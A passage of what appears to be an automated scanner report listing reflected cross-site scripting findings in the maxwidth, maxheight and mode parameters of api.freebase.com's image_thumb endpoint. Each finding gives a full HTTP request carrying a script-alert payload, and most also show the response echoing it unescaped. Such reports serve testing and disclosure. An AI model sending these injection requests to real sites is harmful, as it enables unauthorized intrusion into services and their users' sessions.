Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:57 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.017, mcs=0.0, mcu=0.0, tm=0.0, utime=0.016
Expires: Thu, 12 May 2011 13:30:58 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3219c68<script>alert(1)</script>0b3c41db23c"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008"
}

2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 79d15<script>alert(1)</script>9d176111042 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=32&mode=fillcrop79d15<script>alert(1)</script>9d176111042 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:25Z;0067
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop79d15<script>alert(1)</script>9d176111042"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop79d15<script>
...[SNIP]...

2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 2859f<script>alert(1)</script>c6228f7744b was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=322859f<script>alert(1)</script>c6228f7744b&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, oublock=8, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "322859f<script>alert(1)</script>c6228f7744b"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027"
}

2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload e65d4<script>alert(1)</script>907a070820 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32e65d4<script>alert(1)</script>907a070820&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:02 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032
Content-Length: 388

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e65d4<script>alert(1)</script>907a070820"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032"
}

2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload db893<script>alert(1)</script>797f7dc6251 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=32&mode=fillcropdb893<script>alert(1)</script>797f7dc6251 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:35Z;0044
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropdb893<script>alert(1)</script>797f7dc6251"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropdb893<script>
...[SNIP]...

2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 4d0a8<script>alert(1)</script>d2a62a0b628 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=324d0a8<script>alert(1)</script>d2a62a0b628&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.014, dt=0.015, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.014
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324d0a8<script>alert(1)</script>d2a62a0b628"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058"
}

2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload e5519<script>alert(1)</script>3d346272cd9 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32e5519<script>alert(1)</script>3d346272cd9&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e5519<script>alert(1)</script>3d346272cd9"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}

2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 47e6c<script>alert(1)</script>6642222ca67 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=32&mode=fillcrop47e6c<script>alert(1)</script>6642222ca67 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:09Z;0058
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop47e6c<script>alert(1)</script>6642222ca67"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop47e6c<script>
...[SNIP]...

2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 4e8bf<script>alert(1)</script>42751bc8816 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=324e8bf<script>alert(1)</script>42751bc8816&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324e8bf<script>alert(1)</script>42751bc8816"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041"
}

2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 7e969<script>alert(1)</script>d8001a0cd8d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=327e969<script>alert(1)</script>d8001a0cd8d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "327e969<script>alert(1)</script>d8001a0cd8d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}

2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload ba731<script>alert(1)</script>fdadf40e93f was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=32&mode=fillcropba731<script>alert(1)</script>fdadf40e93f HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, stime=0.001, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:09Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropba731<script>alert(1)</script>fdadf40e93f"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropba731<script>
...[SNIP]...

2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 380fc<script>alert(1)</script>5b8117cdbae was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32380fc<script>alert(1)</script>5b8117cdbae&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32380fc<script>alert(1)</script>5b8117cdbae"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028"
}

2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 3c299<script>alert(1)</script>31911d8bd05 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=323c299<script>alert(1)</script>31911d8bd05&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:56 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:57 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "323c299<script>alert(1)</script>31911d8bd05"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065"
}

2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 7a37d<script>alert(1)</script>0b43494b15d was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32&mode=fillcrop7a37d<script>alert(1)</script>0b43494b15d HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:25Z;0036
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop7a37d<script>alert(1)</script>0b43494b15d"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop7a37d<script>
...[SNIP]...

2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload bc7ce<script>alert(1)</script>03297e6eafc was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32bc7ce<script>alert(1)</script>03297e6eafc&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.017, dt=0.018, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.017
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32bc7ce<script>alert(1)</script>03297e6eafc"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057"
}

2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 47977<script>alert(1)</script>52d97883a5d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=3247977<script>alert(1)</script>52d97883a5d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.012
